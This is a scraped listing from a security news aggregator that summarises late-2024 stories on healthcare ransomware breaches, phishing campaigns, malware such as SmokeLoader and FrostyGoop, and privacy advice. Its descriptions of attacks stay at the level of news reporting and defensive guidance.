What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2024-12-09 13:00:57 | The Invisible Eyes and Ears in Our Homes: How Smart Devices are Eroding Privacy and Security (lien direct) | >A Quiet Breach in the Heart of Our Homes Privacy is generally held as a fundamental right, with citizens often having high expectations regarding the protection of their personal information. Citizens protest when they fear that governments are increasing their involvement in the citizens\' personal life. However, they don\'t consider how much personal and sensitive data they share with any application that they install on their smartphone, or with smart devices in their homes. Big tech companies and vendors of personal devices such as wearables, smartphones, and voice assistants collect intimate details about their users-often far more than any healthcare […]
>A Quiet Breach in the Heart of Our Homes Privacy is generally held as a fundamental right, with citizens often having high expectations regarding the protection of their personal information. Citizens protest when they fear that governments are increasing their involvement in the citizens\' personal life. However, they don\'t consider how much personal and sensitive data they share with any application that they install on their smartphone, or with smart devices in their homes. Big tech companies and vendors of personal devices such as wearables, smartphones, and voice assistants collect intimate details about their users-often far more than any healthcare […] |
Medical | ★★★ | |
 |
2024-12-09 12:41:30 | Anna Jaques Hospital Ransomware Breach Exposes Patient Data (lien direct) | >Ransomware attacks continue to disrupt industries worldwide, with healthcare remaining a high-profile target due to the sensitivity and critical nature of its data. Anna Jaques Hospital experienced a ransomware attack in late 2023, exposing confidential information of over 310,000 patients. Recently, the incident returned to the spotlight due to new updates on the breach\'s scope …
>Ransomware attacks continue to disrupt industries worldwide, with healthcare remaining a high-profile target due to the sensitivity and critical nature of its data. Anna Jaques Hospital experienced a ransomware attack in late 2023, exposing confidential information of over 310,000 patients. Recently, the incident returned to the spotlight due to new updates on the breach\'s scope … |
Ransomware Medical | ★★ | |
 |
2024-12-05 12:49:54 | Cybersecurity Stop of the Month: \\'Tis the Season To Click Carefully-How Proofpoint Stopped a Dropbox Phishing Scam (lien direct) | The Cybersecurity Stop of the Month blog series explores the ever-evolving tactics of today\'s cybercriminals and how Proofpoint helps organizations better fortify their email defenses to protect people against today\'s emerging threats. Phishing attacks surged significantly in 2024, increasing nearly 60% year-over-year. Experts have noted that not only are these attacks growing in volume but they\'re also becoming more sophisticated. Shifts in the threat landscape-driven by advances in generative AI and evolving social engineering tactics-are enabling cybercriminals to conduct more personalized, sophisticated attacks that are increasingly difficult to detect. Globally, an average of 4 billion phishing emails are sent per day. The increased success of these attacks has contributed to a high financial toll. By the end of the year, projected global costs could potentially reach $250 billion. Sectors like finance and insurance have been hit the hardest-experiencing over 27% of all phishing attacks-while technology, healthcare and education are also major targets. Today, we\'ll explore one type of phishing attack that is particularly hard to identify, which is called Dropbox phishing. Background During the past few years, Dropbox phishing scams have grown more sophisticated. Here here\'s how they typically work: Steps in a Dropbox phishing scam. Phishing attacks that use legitimate Dropbox infrastructure are hard to identify for several reasons, including: Abuse of a legitimate service. A bad actor uploads a compromised document-like a PDF with an embedded malicious URL-and sends it directly through Dropbox. Because the threat is sent through a legitimate service, it can effectively bypass an organization\'s email security defenses. Email pretexting. A malicious phishing email that initiates the attack can be very convincing. Bad actors often include realistic pretexts, such as “You\'ve been invited to view a file” or “A file was shared with you,” which closely mirror legitimate Dropbox notifications. Trust in the brand. Dropbox is widely trusted and frequently used for file sharing. If users regularly log into Dropbox to access shared files, they are less likely to scrutinize the login prompt, especially if they\'re accustomed to receiving Dropbox file-sharing invitations. This type of attack is very stealthy and highly undetectable. Bad actors can launch and share any type of attack via Dropbox, including ransomware and malware. The scenario In this recent attack, a bad actor used legitimate Dropbox infrastructure to send a recipient a link to a malicious document that only they could access. The target organization was a New England-based non-profit, which owns and operates upwards of 12,000 homes and 102 properties across 11 states. The organization\'s incumbent email security was Microsoft 365 E3 plus an add-on API-based tool. Unfortunately, neither tool detected, blocked or remediated this advanced phishing attack, which left the organization vulnerable to a potential cyberattack or data breach. The threat: How did the attack happen? Here is a closer look at how the attack unfolded: 1. Legitimate Dropbox message. A bad actor targeted employees with a shared PDF file , which could only be accessed by the recipients. The login message was genuine and was sent by the real Dropbox service. Legitimate Dropbox message received by the user. 2. Legitimate Dropbox login. To view the shared PDF file, employees needed to click on the “View in Dropbox” button. If they would have clicked on the link, they would have been prompted to login and authenticate into the Dropbox service. Both the login screen and authentication messages were valid as they sent from the real Dropbox service. Legitimate Dropbox login page for accessing the shared file. 3. Dropbox phishing page. Once authenticated, users would open | Ransomware Data Breach Malware Tool Threat Medical Cloud | ★★ | |
 |
2024-12-03 15:00:00 | Ransomware\\'s Grip on Healthcare (lien direct) | Until C-level executives fully understand potential threats and implement effective mitigation strategies, healthcare organizations will remain vulnerable and at risk of disruption.
Until C-level executives fully understand potential threats and implement effective mitigation strategies, healthcare organizations will remain vulnerable and at risk of disruption. |
Ransomware Medical | ★★ | |
 |
2024-12-03 07:00:00 | Best Ways to Reduce Your Digital Footprint Now (lien direct) | Every activity you perform online, whether it is commenting on a news article, sharing something on social media or your shopping preferences leaves a digital footprint. This digital trail helps organizations find more about you. And while it does offer a certain degree of convenience, it can be a real hazard to your online privacy. Fortunately, there are several ways you can use to reduce your digital footprint and help ensure your privacy. Understanding Your Digital Footprint A digital footprint is a trail of data a person leaves online while using the internet. This data includes your search history, photos and videos you might have uploaded, newsletter subscriptions and more. Also known as the \'digital shadow,\' your footprint data can help paint a picture of who you are. Therefore, most apps, websites and online marketers use your digital footprint to personalize your browsing experience. However, your online footprint can also wreck your online privacy in several ways and is one of the common causes of data breaches. Since almost every action is recorded online, the record that forms a footprint is unique to every user. The type of footprint depends on how it is left or collected. There are two main types of digital footprints: Active Digital Footprint An active digital footprint is the data you intentionally leave online or rather the things you actively do online. This includes your online posts, comments, online shopping or even signing up for a newsletter. All these things are parts of your active digital footprint. Passive Digital Footprint A passive digital footprint is the data you share unintentionally. This data usually depends on the cookies that a website is using whenever you visit it. Using cookies, a website may track how many times you have visited it, your biometric and geolocation data and even your IP address. Both active and passive digital footprints can be tracked and stored by multiple sources. If you are curious about how to check your digital footprint, consider these four main methods: search your name on popular search engines like Google and Yahoo, use digital footprint checkers, check your public accounts and also look for data breaches through breach detection services. Does My Digital Footprint Disrupt My Online Privacy? Can I Delete It? A digital footprint is permanent, and deleting it is next to impossible. Once your data is public, you have little control over how others use it. All the information left behind due to your online activities is used and stored by third-party services, your services providers or the government. However, one of the most dangerous aspects of an online footprint is that you never know how big it is. Since every app and site collects, stores and shares bits of your information, there is no way to completely track and eliminate all that information. This means that even the parts of your life you would want to keep private such as your medical information can be revealed online through your online orders or search history. Here are some ways your online footprint disrupts your privacy: Information is valuable to cybercriminals, who can exploit your digital footprint. They can gather enough relevant information to commit identity theft, phishing, cyberbullying and bank scams. You receive more spam emails and phone calls. Since your information is shared publicly and with third parties, it is one of the reasons you receive spam emails. Potential employers may gain access to outdated and unwanted information and reject you on that basis. According to a study, seven out of ten employers run an employee background check on social media platforms and have rejected 57% of people | Spam Tool Threat Studies Medical | Yahoo | ★★ |
 |
2024-12-02 19:31:00 | SmokeLoader Malware Resurfaces, Targeting Manufacturing and IT in Taiwan (lien direct) | Taiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware.
"SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks," Fortinet FortiGuard Labs said in a report shared with The Hacker News.
"While
Taiwanese entities in manufacturing, healthcare, and information technology sectors have become the target of a new campaign distributing the SmokeLoader malware. "SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks," Fortinet FortiGuard Labs said in a report shared with The Hacker News. "While |
Malware Medical | ★ | |
 |
2024-12-02 12:13:17 | Weekly OSINT Highlights, 2 December 2024 (lien direct) | ## Snapshot Last week\'s OSINT reporting highlights the sophistication and diversity of cyber threat campaigns, emphasizing advanced techniques, varied attack vectors, and strategic targeting. Key themes include ransomware operations like Elpaco and CyberVolk, leveraging advanced encryption and Ransomware-as-a-Service models, and phishing campaigns such as Rockstar 2FA and SVG-based malware distribution showcasing innovative tactics to bypass MFA and exploit image formats. Attack vectors spanned vulnerabilities like Zerologon and CVE-2023-28461, legitimate tools like Atera, and novel methods like Wi-Fi proximity attacks. Threat actors ranged from state-sponsored groups to financially motivated cybercriminals and hacktivists. The targets reflected global geopolitical and economic stakes, focusing on public sectors, critical infrastructure, and high-value industries across Europe, the US, and Asia, reinforcing the importance of proactive threat intelligence and mitigation strategies. ## Description 1. [BianLian\'s Shift to Data Extortion](https://sip.security.microsoft.com/intel-explorer/articles/c958d17f): The BianLian ransomware group has transitioned from file encryption to data theft extortion, leveraging tactics like privilege escalation, SOCKS5 tunneling, and customized PowerShell scripts. Active since 2022, the group targets sectors like healthcare and airlines, using techniques such as ProxyShell exploitation and calling employees to pressure ransom payments. 1. [BYOVD Campaign Exploiting Avast Driver](https://sip.security.microsoft.com/intel-explorer/articles/75844a3f): Trellix researchers discovered malware leveraging the Bring-Your-Own-Vulnerable-Driver (BYOVD) technique with Avast\'s outdated anti-rootkit driver to bypass tamper protections. The malware terminates security processes using kernel-level privileges, posing significant risks to organizations relying on antivirus and EDR solutions. 1. [SpyLoan Apps Targeting Global Users](https://sip.security.microsoft.com/intel-explorer/articles/ddc51ef9): McAfee Labs reported a surge in SpyLoan apps on Android devices, exploiting users in South America, Asia, and Africa through predatory practices. These apps harvest sensitive data, extort victims, and misuse permissions, leading to financial fraud and harassment. 1. [Exploitation of CVE-2023-28461](https://sip.security.microsoft.com/intel-explorer/articles/4d4a4d34): CISA flagged CVE-2023-28461, a vulnerability in Array Networks\' ArrayOS, as actively exploited and mandated remediation by December 2024. Exploited due to improper authentication, the vulnerability threatens both federal and non-federal organizations. 1. [Hexon Stealer Targets Discord Users](https://sip.security.microsoft.com/intel-explorer/articles/19796350): CYFIRMA linked Hexon Stealer, a rebranded version of Stealit Stealer, to credential theft and cryptocurrency wallet exfiltration. Built with the Electron framework, the malware injects malicious code into Discord, enabling full system control for attackers. 1. [North Korean IT Worker Front Companies](https://sip.security.microsoft.com/intel-explorer/articles/d3dd2b00): SentinelLabs uncovered DPRK\'s use of fake tech companies impersonating U.S. brands to secure global contracts and fund state programs. These front companies route payments through shadow banking systems and cryptocurrencies, supporting activities like weapons development. 1. [Elpaco Ransomware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/73371539): Kaspersky reported the Elpaco ransomware, a variant of Mimic, exploiting RDP brute force and Zerologon (CVE-2020-1472) for privilege escalation. The attacks, targeting various global industries, employ advanced encryption techniques and file discovery methods, rendering files unrecoverable without the private key. 1. [CyberVolk Ransomware Operations](https://sip.security.microsoft.com/intel-explorer/articles/db8b4022): CyberVolk, a pro-Russian hacktivist group, has deployed ransomware like Hexa | Ransomware Malware Tool Vulnerability Threat Mobile Medical | ★★ | |
 |
2024-11-29 19:29:24 | Italian football club Bologna FC says company data stolen during ransomware attack (lien direct) | Bologna FC\'s confirmation comes days after the RansomHub ransomware gang claimed to have attacked the club and stolen financial and medical documents.
Bologna FC\'s confirmation comes days after the RansomHub ransomware gang claimed to have attacked the club and stolen financial and medical documents. |
Ransomware Medical | ★★ | |
 |
2024-11-27 16:10:00 | New EU Commission to Unveil Healthcare Cybersecurity Plan in First 100 Days (lien direct) | One of the priorities of the newly-approved Von der Leyen Commission II will be to strengthen the healthcare sector\'s cyber resilience
One of the priorities of the newly-approved Von der Leyen Commission II will be to strengthen the healthcare sector\'s cyber resilience |
Medical | ★★ | |
|
2024-11-26 18:02:16 | Canadian privacy regulators publish details of medical testing company\\'s data breach (lien direct) | A 2020 report detailing the hack of a Canadian medical testing company was released Monday after a court ruled it could be made public, ending a four-year battle during which the company sought to keep the details of the investigation secret.
A 2020 report detailing the hack of a Canadian medical testing company was released Monday after a court ruled it could be made public, ending a four-year battle during which the company sought to keep the details of the investigation secret. |
Data Breach Hack Medical | ★★ | |
|
2024-11-26 14:37:00 | What Are Computer Worms? (lien direct) | In today\'s interconnected digital world, businesses are constantly under threat from cybercriminals seeking to exploit vulnerabilities in systems, networks, and devices. One of the most persistent and silent threats that organizations face is computer worms. These malicious programs can spread across networks, infecting systems autonomously and wreaking havoc before a user even realizes something is wrong. Computer worms are a type of malware designed to replicate themselves and spread autonomously across networks and computer systems. Unlike traditional viruses that require user action to propagate, computer worms can self-replicate without needing to attach to a host file or program. This unique capability makes them especially dangerous, as they can spread rapidly and infect numerous devices before users are even aware of their presence. The impact of computer worms can range from reduced system performance to the complete loss of critical data. High-profile attacks, such as those by the infamous Code Red and WannaCry worms, have highlighted how severe and disruptive these threats can be. Despite the growing awareness of cybersecurity threats like viruses, ransomware, and phishing attacks, computer worms remain one of the most harmful types of malware. They can silently infiltrate your network, consume bandwidth, corrupt or steal data, and even open the door to additional attacks. Understanding what computer worms are, how they work, and how to defend against them is crucial for any business, large or small. In this article, we will explore the nature of computer worms, their risks and potential damage, and how to protect your organization against them. Let’s dive in! Computer Worm Definition At its core, a computer worm is a type of self-replicating malware that spreads across networks or systems without anyone doing anything. Unlike traditional viruses that require users to open infected files or click on malicious links, worms can propagate autonomously once they find an entry point into a system. Their primary purpose is to replicate themselves, often at an alarming rate, and spread from one computer to another, often exploiting vulnerabilities in network protocols, software, or operating systems. A worm virus is often distinguished by its ability to move freely across networks, infecting computers and servers, consuming resources, and in many cases, causing significant damage in the process. The worst part? Worms often don’t need a host file or a user action to activate; they spread automatically, which makes them far more dangerous and difficult to contain than traditional malware. To better understand what makes worms unique, let\'s define them more clearly: A computer worm is a standalone malicious program that can replicate and propagate across computer systems and networks. Unlike traditional viruses, worms do not attach themselves to files or require users to run them. They spread through network connections, exploiting vulnerabilities in software and hardware. Worms often carry out harmful actions such as data theft, system corruption, or creating backdoors for other types of malware like ransomware or Trojan horses. The main difference between worms and other malware (like viruses or spyware) is that worms focus specifically on self-replication and spreading across networks, whereas viruses typically need to attach themselves to an existing file or program. While all worms share common traits, there are various types based on how they spread or the methods they use to exploit systems: Email Worms: These worms spread through email systems, often by sending malicious attachments or links to everyone in a user’s contact list. The ILOVEYOU worm, one of the most infamous examples, spread via email attachments and wreaked havoc on millions of systems. Network Worms: These worms target security vulnerabilities in network protocols, services, | Ransomware Data Breach Spam Malware Tool Vulnerability Threat Patching Mobile Industrial Medical Technical | Wannacry | ★★ |
 |
2024-11-26 10:10:34 | US senators debut bipartisan legislation to fortify cybersecurity, protect data across healthcare sector (lien direct) | After establishing their healthcare working group last year, U.S. Senators Bill Cassidy, a Louisiana Republican and the ranking...
After establishing their healthcare working group last year, U.S. Senators Bill Cassidy, a Louisiana Republican and the ranking... |
Legislation Medical | ★★★ | |
|
2024-11-25 22:13:05 | Warning Against Malware in SVG Format Distributed via Phishing Emails (lien direct) | ## Snapshot Researchers at AhnLab Security Intelligence Center (ASEC) have identified a campaign where malware is being distributed through Scalable Vector Graphics (SVG) files. ## Description These SVG files are being used as attachments in phishing emails, with instructions in the email body on how to execute the file. The SVG malware comes in two types: a downloader type that deceives users into downloading a PDF file, and a phishing type that prompts users to enter account credentials to view an Excel document. The downloader type contains hyperlinks within image content elements that lead to additional malware hosted on legitimate services like Dropbox and Bitbucket. The malware downloaded is a password-protected compressed file containing [AsyncRat](https://security.microsoft.com/intel-profiles/e9216610feb409dfb620b28e510f2ae2582439dfc7c7e265815ff1a776016776), which is capable of stealing information and creating a backdoor. The phishing type uses obfuscated JavaScript within the SVG to encode and transmit the victim\'s account information to the attacker\'s server. This technique of embedding malicious code within image content elements makes it challenging for users to recognize the SVG file as harmful. The increase in the use of various file formats for malware distribution, including SVG, highlights the need for caution when opening email attachments from unknown sources, especially those in SVG format. ## Microsoft Analysis and Additional OSINT Context AsyncRAT is a .NET-based remote access trojan (RAT) that enables attackers to remotely control infected Windows systems, conducting malicious activities such as keylogging, file theft, screenshot capture, and even ransomware deployment. Leveraging asynchronous programming, AsyncRAT can execute multiple tasks simultaneously in the background without affecting the system\'s performance, making it stealthy and efficient. To evade detection, AsyncRAT employs obfuscation, encrypts its traffic, disables security features like Windows Defender, and uses dynamic DNS to mask its C2 server\'s location. Active since at least 2019, it is frequently used to target industries such as finance, healthcare, government, and education. AsyncRAT\'s versatility and ability to evade detection make it a persistent threat in the cyber landscape. Researchers at G DATA Security Lab, identified a similar campaign in which attackers [distributed AsyncRAT through Bitbucket.](https://security.microsoft.com/intel-explorer/articles/8e774461) In this campaign, a VBS file contained a hidden code that executed a PowerShell command which retrieves AsyncRAT from a Bitbucket repository. [Other legitimate tools, such as TryCloudflare tunnel infrastructure, have been used to execute the AsyncRAT payload.](https://security.microsoft.com/intel-explorer/articles/bf7946e8) Threat actors are increasingly using legitimate file hosting services like SharePoint, OneDrive, and Dropbox for identity phishing and business email compromise (BEC) attacks. These campaigns involve sophisticated social engineering and defense evasion tactics, such as files with restricted access and view-only restrictions, making detection difficult. Typically, the attack begins with compromising a trusted vendor and sharing malicious files that appear legitimate, often requiring re-authentication and leading to identity compromise. Techniques like restricted access files, view-only mode, and time-limited access hinder traditional security measures. Find out more about this tact by reading Microsoft\'s blog: [File hosting services misused for identity phishing](https://www.microsoft.com/en-us/security/blog/2024/10/08/file-hosting-services-misused-for-identity-phishing/?msockid=029395c08bc2665b315481458a11673b). ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your an | Ransomware Malware Tool Threat Medical | ★★★ | |
|
2024-11-22 07:00:00 | DSPM vs CSPM: Key Differences and Their Roles in Data Protection (lien direct) | It’s becoming increasingly challenging to secure sensitive data. Cybercriminals are becoming more sophisticated, IT infrastructure is becoming more complex, and attack surfaces are increasing. With so much data now stored off-premises, organizations must protect not only their sensitive information but also the platforms that house it. This is where data security posture management (DPSM) and cloud security posture management (CPSM) come in. Both technologies play critical roles in cloud data security and can be easily confused at first glance. So, let’s explore their key differences and their role in data protection. Understanding DPSM As the name suggests, DPSM is a data security tool. It is based on the idea that securing an organization’s sensitive information requires a deep understanding of the data itself. As such, DPSM solutions discover and classify sensitive data in cloud repositories, identifying vulnerabilities and potential risks associated with that data. DPSM tools work in four phases. First, they discover an organization’s data across all its off-premises (cloud) platforms and classify it by its sensitivity to provide a comprehensive, contextualized data inventory. They then monitor cloud environments in real-time to identify any vulnerabilities or misconfigurations that could present a risk to data—the more sensitive the information, the higher the priority for remediation. By protecting data in this way, DPSM helps organizations maintain compliance with relevant regulations such as GDPR, HIPAA, and PCI DSS. Understanding CPSM Again, as the name suggests, CPSM is a cloud security tool. Rather than focusing on the data stored in cloud environments – as DPSM does – it focuses on securing the cloud infrastructure itself, continuously monitoring for misconfigurations, compliance issues, and security threats to help entities manage data access and data risk. These solutions scan for misconfigurations – including vulnerabilities in cloud settings, permissions, and access controls – monitor for compliance with regulatory requirements and industry standards like CIS, NIST, CCPA, and GDPR, and ultimately help organizations remediate any issues before they turn into genuine security incidents. Key Differences Between DPSM and CPSM Although both DSPM and CSPM play vital roles in cloud security, their focus areas, tools and techniques, and use cases differ as follows: Focus Area: DSPM is primarily data-centric, concentrating on protecting sensitive information stored in the cloud. In contrast, CSPM focuses on the broader infrastructure, ensuring the cloud environment is secure. Tools and Techniques: DSPM uses data classification and encryption techniques, while CSPM employs tools for monitoring, detecting misconfigurations, and managing security policies. Use Cases: DSPM is ideal for protecting data assets and ensuring compliance, especially in heavily regulated industries. CSPM is more suitable for preventing infrastructure-based vulnerabilities and maintaining cloud security hygiene. These differences highlight that while DSPM ensures that data is properly secured and compliant, CSPM works to keep the underlying cloud infrastructure safe from threats and vulnerabilities. Real-World Use Cases To put al | Tool Vulnerability Threat Medical Cloud | ★★★ | |
 |
2024-11-21 10:05:26 | 750,000 Patients\\' Medical Records Exposed After Data Breach at French Hospital (lien direct) | When we think about our data being leaked onto the internet, we often picture it as our financial records, our passwords, our names and addresses... what is less often considered is the exposure of our private medical information. A French hospital has found itself in the unenviable position of learning that hackers have gained access to the medical records of over 750,000 patients following a cyber attack. A hacker calling themselves "nears" claims to have compromised the systems of multiple healthcare facilities across the country, claiming to have gained access to the records of over 1.5...
When we think about our data being leaked onto the internet, we often picture it as our financial records, our passwords, our names and addresses... what is less often considered is the exposure of our private medical information. A French hospital has found itself in the unenviable position of learning that hackers have gained access to the medical records of over 750,000 patients following a cyber attack. A hacker calling themselves "nears" claims to have compromised the systems of multiple healthcare facilities across the country, claiming to have gained access to the records of over 1.5... |
Data Breach Medical | ★★★ | |
|
2024-11-21 01:08:59 | FBI says BianLian based in Russia, moving from ransomware attacks to extortion (lien direct) | The ransomware group has drawn scrutiny for attacks on charities like Save The Children as well as healthcare firms like Boston Children\'s Health Physicians. On Tuesday, it took credit for an attack on a Canadian healthcare company.
The ransomware group has drawn scrutiny for attacks on charities like Save The Children as well as healthcare firms like Boston Children\'s Health Physicians. On Tuesday, it took credit for an attack on a Canadian healthcare company. |
Ransomware Medical | ★★ | |
|
2024-11-21 00:18:57 | FrostyGoop\\'s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications (lien direct) | #### Targeted Geolocations
- Ukraine
## Snapshot
Unit 42 researchers at Palo Alto Networks, have identified the OT-centric malware FrostyGoop, also known as BUSTLEBERM, which targets Operational Technology (OT) systems. First observed in a [January 2024 attack](https://sip.security.microsoft.com/intel-explorer/articles/cf8f8199) by Russian threat actors on a municipal energy company in Ukraine, FrostyGoop disrupted power supply by sending Modbus TCP commands to ICS devices, affecting heating services for over 600 apartment buildings in Ukraine.
## Description
FrostyGoop malware, compiled in Go, uses a Modbus TCP connection to interact with ICS/OT devices and can perform various Modbus operations such as reading, writing, and writing multiple commands based on parameters in a JSON configuration file. The initial compromise may have involved a vulnerability in a MikroTik router, with the malware leveraging an open-source Modbus implementation and containing debugger evasion techniques. It logs output to a console or a JSON file and is associated with a Windows executable named go-encrypt.exe, which uses AES encryption to conceal target information. FrostyGoop also implements a debugger evasion technique by checking the BeingDebugged value in Windows\' Process Environment Block (PEB).
## Microsoft Analysis and Additional OSINT Context
The cybersecurity landscape for OT environments is increasingly dangerous, with a rise in ICS-centric malware like FrostyGoop and a growing number of OT and IoT devices exposed to the internet. Adversaries, including nation-state actors, ransomware groups, and hacktivists, are leveraging these vulnerabilities to target critical infrastructure sectors such as energy, transportation, and healthcare. The convergence of IT and OT networks introduces additional risks, as attackers exploit traditional IT entry points to access OT systems.
Russia has been aggressively targeting Ukrainian critical infrastructure with both cyberattacks and missiles. For example, in April, Ukraine\'s computer emergency response team (CERT-UA) reported that [Seashell Blizzard had targeted](https://therecord.media/frostygoop-malware-ukraine-heat) nearly 20 energy facilities in Ukraine that spring, potentially to amplify the impact of intense Russian missile and drone strikes on critical infrastructure.
Additionally, in May 2024, CISA issued a joint statement highlighting ongoing [pro-Russia hacktivist activity targeting ICS and small-scale OT systems](https://www.cisa.gov/resources-tools/resources/defending-ot-operations-against-ongoing-pro-russia-hacktivist-activity) across North American and European critical infrastructure sectors, including Water and Wastewater Systems, Dams, Energy, and Food and Agriculture. While these attacks often rely on unsophisticated techniques that create nuisance effects, investigations reveal that such actors are capable of leveraging more advanced methods to exploit insecure and misconfigured OT environments, potentially causing physical harm.
## Detections/Hunting Queries
### Microsoft Defender Antivirus
Microsoft Defender Antivirus detects threat components as the following malware
- Trojan:Win32/FrostyGoop
## References
[FrostyGoop\'s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications](https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/) Palo Alto Unit 42 (accessed 2024-11-19)
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
#### Targeted Geolocations - Ukraine ## Snapshot Unit 42 researchers at Palo Alto Networks, have identified the OT-centric malware FrostyGoop, also known as BUSTLEBERM, which targets Operational Technology (OT) systems. First observed in a [January 2024 attack](https://sip.security.microsoft.com/intel-explorer/articles/cf8f |
Ransomware Malware Vulnerability Threat Industrial Medical | ★★ | |
 |
2024-11-20 21:20:19 | Cyberattack at French hospital exposes health data of 750,000 patients (lien direct) | A data breach at an unnamed French hospital exposed the medical records of 750,000 patients after a threat actor gained access to its electronic patient record system. [...]
A data breach at an unnamed French hospital exposed the medical records of 750,000 patients after a threat actor gained access to its electronic patient record system. [...] |
Data Breach Threat Medical | ★★ | |
 |
2024-11-20 18:01:08 | Mega US healthcare payments network restores system 9 months after ransomware attack (lien direct) | Change Healthcare\'s $2 billion recovery is still a work in progress Still reeling from its February ransomware attack, Change Healthcare confirms its clearinghouse services are back up and running, almost exactly nine months since the digital disruption began.…
Change Healthcare\'s $2 billion recovery is still a work in progress Still reeling from its February ransomware attack, Change Healthcare confirms its clearinghouse services are back up and running, almost exactly nine months since the digital disruption began.… |
Ransomware Medical | ★★★ | |
 |
2024-11-20 11:12:50 | Healthcare organisations see employees as weak link in cyber defences; workers admit they are disengaged in training (lien direct) | Healthcare organisations see employees as weak link in cyber defences; workers admit they are disengaged in training
-
Special Reports
Healthcare organisations see employees as weak link in cyber defences; workers admit they are disengaged in training - Special Reports |
Medical | ★★ | |
|
2024-11-20 00:30:07 | Healthcare org Equinox notifies 21K patients and staff of data theft (lien direct) | Ransomware scum LockBit claims it did the dirty deed Equinox, a New York State health and human services organization, has begun notifying over 21 thousand clients and staff that cyber criminals stole their health, financial, and personal information in a "data security incident" nearly seven months ago.…
Ransomware scum LockBit claims it did the dirty deed Equinox, a New York State health and human services organization, has begun notifying over 21 thousand clients and staff that cyber criminals stole their health, financial, and personal information in a "data security incident" nearly seven months ago.… |
Medical | ★★★ | |
|
2024-11-19 10:25:48 | New HSCC playbook empowers medical product manufacturers to tackle cyber incidents effectively (lien direct) | >The U.S. Healthcare and Public Health Sector Coordinating Council (HSCC) released the Medical Product Manufacturer Cyber Incident Response...
>The U.S. Healthcare and Public Health Sector Coordinating Council (HSCC) released the Medical Product Manufacturer Cyber Incident Response... |
Medical | ★★ | |
|
2024-11-18 13:38:03 | DHS Releases Secure AI Framework for Critical Infrastructure (lien direct) | The voluntary recommendations from the Department of Homeland Security cover how artificial intelligence should be used in the power grid, water system, air travel network, healthcare, and other pieces of critical infrastructure.
The voluntary recommendations from the Department of Homeland Security cover how artificial intelligence should be used in the power grid, water system, air travel network, healthcare, and other pieces of critical infrastructure. |
Medical | ★★ | |
|
2024-11-18 12:22:31 | Weekly OSINT Highlights, 18 November 2024 (lien direct) | ## Snapshot Last week\'s OSINT reporting highlights a diverse array of cyber threats, including ransomware, phishing, espionage, and supply chain attacks. Key trends include evolving attack vectors like malicious .LNK files and PowerShell-based lateral movements, as seen in campaigns targeting Pakistan and other regions. Threat actors span from state-sponsored groups such as North Korea\'s Lazarus and China\'s TAG-112 to financially motivated groups like SilkSpecter, with targets including critical sectors like manufacturing, government, healthcare, and e-commerce. Information stealers emerged as a notable theme, with malware such as RustyStealer, Fickle Stealer, and PXA Stealer employing advanced obfuscation and multi-vector attacks to exfiltrate sensitive data from diverse sectors. The reports underscore sophisticated evasion tactics, the leveraging of legitimate platforms for malware delivery, and the persistent targeting of vulnerable backup and storage systems. ## Description 1. [Ymir Ransomware Attack](https://sip.security.microsoft.com/intel-explorer/articles/1444d044): Researchers at Kaspersky identified Ymir, a ransomware variant that performs operations entirely in memory and encrypts data using the ChaCha20 algorithm. Attackers used PowerShell-based lateral movement and reconnaissance tools, employing RustyStealer malware to gain initial access and steal data, targeting systems in Colombia among other regions. 1. [WIRTE Group Cyber Attacks](https://sip.security.microsoft.com/intel-explorer/articles/17c5101d): Check Point Research linked WIRTE, a Hamas-connected group, to espionage and disruptive cyber attacks in 2024, including PDF lure-driven Havoc framework deployments and SameCoin wiper campaigns targeting Israeli institutions. WIRTE, historically aligned with the Molerats, focuses on politically motivated attacks in the Middle East, showcasing ties to Gaza-based cyber activities. 1. [DoNot Group Targets Pakistani Manufacturing](https://sip.security.microsoft.com/intel-explorer/articles/25ee972c): The DoNot group launched a campaign against Pakistan\'s manufacturing sector, focusing on maritime and defense industries, using malicious .LNK files disguised as RTF documents to deliver stager malware via PowerShell. The campaign features advanced persistence mechanisms, updated AES encryption for C&C communications, and dynamic domain generation, highlighting their evolving evasion tactics. 1. [Election System Honeypot Findings](https://sip.security.microsoft.com/intel-explorer/articles/1a1b4eb7): Trustwave SpiderLabs\' honeypot for U.S. election infrastructure recorded attacks like brute force, SQL injection, and CVE exploits by botnets including Mirai and Hajime. The attacks, largely driven by exploit frameworks and dark web collaboration, underline persistent threats against election systems. 1. [Chinese TAG-112 Tibetan Espionage](https://sip.security.microsoft.com/intel-explorer/articles/11ae4e70): In May 2024, TAG-112, suspected to be Chinese state-sponsored, compromised Tibetan community websites via Joomla vulnerabilities to deliver Cobalt Strike payloads disguised as security certificates. The campaign reflects Chinese intelligence\'s enduring interest in monitoring and disrupting Tibetan and other minority organizations. 1. [Phishing Campaigns Exploit Ukrainian Entities](https://sip.security.microsoft.com/intel-explorer/articles/95253614a): Russian-linked threat actor UAC-0194 targeted Ukrainian entities with phishing campaigns, exploiting CVE-2023-320462 and CVE-2023-360251 through malicious hyperlinks in emails. The attacks leveraged compromised municipal servers to host malware and facilitate privilege escalation and security bypasses. 1. [Lazarus Group\'s MacOS Targeting](https://sip.security.microsoft.com/intel-explorer/articles/7c6b391d): Lazarus, a North Korean threat actor, deployed RustyAttr malware targeting macOS via malicious apps using Tauri framework, hiding payloads in Extended Attributes (EA). This campaign reflects evolvin | Ransomware Malware Tool Vulnerability Threat Prediction Medical Cloud Technical | APT 41 APT 38 | ★★★ |
 |
